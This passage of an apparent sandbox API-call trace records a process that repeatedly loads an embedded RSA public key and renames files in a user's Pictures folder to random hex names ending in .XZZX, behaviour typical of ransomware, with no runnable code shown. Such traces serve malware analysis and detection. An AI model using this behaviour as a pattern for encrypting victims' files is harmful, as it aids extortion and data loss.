returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.682] SetErrorMode (uMode=0x1) returned 0x1 [0192.682] lstrcpyW (in: lpString1=0x2caf860, lpString2="7ABC26D22C977F5CF918EABE30B863A4.XZZX" | out: lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned="7ABC26D22C977F5CF918EABE30B863A4.XZZX" [0192.682] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x8b53c19d, Data2=0xd7c8, Data3=0x4677, Data4=([0]=0xa7, [1]=0xe0, [2]=0xdb, [3]=0x39, [4]=0x3a, [5]=0xc9, [6]=0xcc, [7]=0x9a))) returned 0x0 [0192.682] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned 80 [0192.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0192.682] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\310A1DA83B64FDF88B53C19D3E2FE240.XZZX") returned 80 [0192.682] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 727 os_tid = 0xdec [0192.838] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.838] lstrcpyW (in: lpString1=0x2caf460, lpString2="7E711D900E3B4440AF6B05F612702888.XZZX" | out: lpString1="7E711D900E3B4440AF6B05F612702888.XZZX") returned="7E711D900E3B4440AF6B05F612702888.XZZX" [0192.838] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.838] SetErrorMode (uMode=0x1) returned 0x1 [0192.839] lstrcpyW (in: lpString1=0x2caf860, lpString2="7E711D900E3B4440AF6B05F612702888.XZZX" | out: lpString1="7E711D900E3B4440AF6B05F612702888.XZZX") returned="7E711D900E3B4440AF6B05F612702888.XZZX" [0192.839] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x701d4bac, Data2=0xa348, Data3=0x41ea, Data4=([0]=0x94, [1]=0x99, [2]=0x6d, [3]=0x32, [4]=0xf0, [5]=0xb6, [6]=0x88, [7]=0x1f))) returned 0x0 [0192.839] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7E711D900E3B4440AF6B05F612702888.XZZX") returned 80 [0192.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0192.839] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2F6BCC602A0A87D0701D4BAC2CD56C18.XZZX") returned 80 [0192.839] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 728 os_tid = 0xdf0 [0192.995] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.995] lstrcpyW (in: lpString1=0x2caf460, lpString2="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" | out: lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" [0192.995] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.995] SetErrorMode (uMode=0x1) returned 0x1 [0192.995] lstrcpyW (in: lpString1=0x2caf860, lpString2="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" | out: lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" [0192.995] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x77e4051, Data2=0x7f70, Data3=0x4f07, Data4=([0]=0x88, [1]=0xd3, [2]=0x96, [3]=0x7d, [4]=0xd9, [5]=0xd2, [6]=0xeb, [7]=0x91))) returned 0x0 [0192.995] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned 80 [0192.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0192.995] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E924527027570C10077E40512A21F058.XZZX") returned 80 [0192.995] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 729 os_tid = 0xdf4 [0193.182] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.182] lstrcpyW (in: lpString1=0x2caf460, lpString2="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" | out: lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" [0193.182] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.182] SetErrorMode (uMode=0x1) returned 0x1 [0193.182] lstrcpyW (in: lpString1=0x2caf860, lpString2="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" | out: lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" [0193.183] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xc7f2bb9a, Data2=0xedb3, Data3=0x4117, Data4=([0]=0x8d, [1]=0x73, [2]=0x42, [3]=0xa3, [4]=0xcb, [5]=0xae, [6]=0x66, [7]=0x43))) returned 0x0 [0193.183] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned 80 [0193.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0193.183] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8666BEAE3C6FCE15C7F2BB9A3F3AB25D.XZZX") returned 80 [0193.183] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 730 os_tid = 0xdfc [0193.322] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.322] lstrcpyW (in: lpString1=0x2caf460, lpString2="8F82071C3E6AA36071D28504428B87A8.XZZX" | out: lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX") returned="8F82071C3E6AA36071D28504428B87A8.XZZX" [0193.322] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.322] SetErrorMode (uMode=0x1) returned 0x1 [0193.322] lstrcpyW (in: lpString1=0x2caf860, lpString2="8F82071C3E6AA36071D28504428B87A8.XZZX" | out: lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX") returned="8F82071C3E6AA36071D28504428B87A8.XZZX" [0193.322] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x8594ec69, Data2=0xe0da, Data3=0x49e8, Data4=([0]=0xb0, [1]=0xfc, [2]=0x11, [3]=0x82, [4]=0x83, [5]=0xd5, [6]=0xe1, [7]=0xfb))) returned 0x0 [0193.322] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8F82071C3E6AA36071D28504428B87A8.XZZX") returned 80 [0193.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0193.322] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0FAD316A40E9EF908594EC6943B4D3D8.XZZX") returned 80 [0193.322] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 731 os_tid = 0xe00 [0193.478] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.478] lstrcpyW (in: lpString1=0x2caf460, lpString2="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" | out: lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" [0193.478] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.478] SetErrorMode (uMode=0x1) returned 0x1 [0193.478] lstrcpyW (in: lpString1=0x2caf860, lpString2="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" | out: lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" [0193.478] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xb6364225, Data2=0x3e72, Data3=0x45d1, Data4=([0]=0x8b, [1]=0xd6, [2]=0x29, [3]=0x92, [4]=0xdf, [5]=0xf9, [6]=0xba, [7]=0xfc))) returned 0x0 [0193.478] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned 80 [0193.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0193.478] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\482E6A7A1107B512B636422513D2995A.XZZX") returned 80 [0193.478] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 732 os_tid = 0xe04 [0193.634] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.634] lstrcpyW (in: lpString1=0x2caf460, lpString2="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" | out: lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" [0193.634] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.634] SetErrorMode (uMode=0x1) returned 0x1 [0193.634] lstrcpyW (in: lpString1=0x2caf860, lpString2="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" | out: lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" [0193.634] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x6715acd5, Data2=0x17d7, Data3=0x4865, Data4=([0]=0xa0, [1]=0x7f, [2]=0x63, [3]=0xb5, [4]=0xc2, [5]=0x39, [6]=0x55, [7]=0x74))) returned 0x0 [0193.634] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned 80 [0193.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0193.634] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\85BB49E306BDDFD36715ACD50988C41B.XZZX") returned 80 [0193.634] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 733 os_tid = 0xe08 [0193.790] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.790] lstrcpyW (in: lpString1=0x2caf460, lpString2="A74BC39B153F2E46BB66A40D1960128E.XZZX" | out: lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX") returned="A74BC39B153F2E46BB66A40D1960128E.XZZX" [0193.790] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.790] SetErrorMode (uMode=0x1) returned 0x1 [0193.790] lstrcpyW (in: lpString1=0x2caf860, lpString2="A74BC39B153F2E46BB66A40D1960128E.XZZX" | out: lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX") returned="A74BC39B153F2E46BB66A40D1960128E.XZZX" [0193.790] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xcdf7b686, Data2=0xfe6b, Data3=0x497c, Data4=([0]=0x83, [1]=0xfe, [2]=0x3e, [3]=0x63, [4]=0x4e, [5]=0x1c, [6]=0xb6, [7]=0xdd))) returned 0x0 [0193.790] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A74BC39B153F2E46BB66A40D1960128E.XZZX") returned 80 [0193.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0193.791] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DDA23E024907BED4CDF7B6864BD2A31C.XZZX") returned 80 [0193.791] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 734 os_tid = 0xe0c [0193.946] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.946] lstrcpyW (in: lpString1=0x2caf460, lpString2="BD094FF047045CCAB6A2A1584B394112.XZZX" | out: lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX") returned="BD094FF047045CCAB6A2A1584B394112.XZZX" [0193.946] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.946] SetErrorMode (uMode=0x1) returned 0x1 [0193.946] lstrcpyW (in: lpString1=0x2caf860, lpString2="BD094FF047045CCAB6A2A1584B394112.XZZX" | out: lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX") returned="BD094FF047045CCAB6A2A1584B394112.XZZX" [0193.946] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x64d2f42d, Data2=0x6e5d, Data3=0x4b9e, Data4=([0]=0x95, [1]=0xc4, [2]=0xb5, [3]=0xec, [4]=0x8d, [5]=0xbe, [6]=0xb, [7]=0xa7))) returned 0x0 [0193.946] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BD094FF047045CCAB6A2A1584B394112.XZZX") returned 80 [0193.946] MultiByteToWideChar (in: CodePage=0x0, 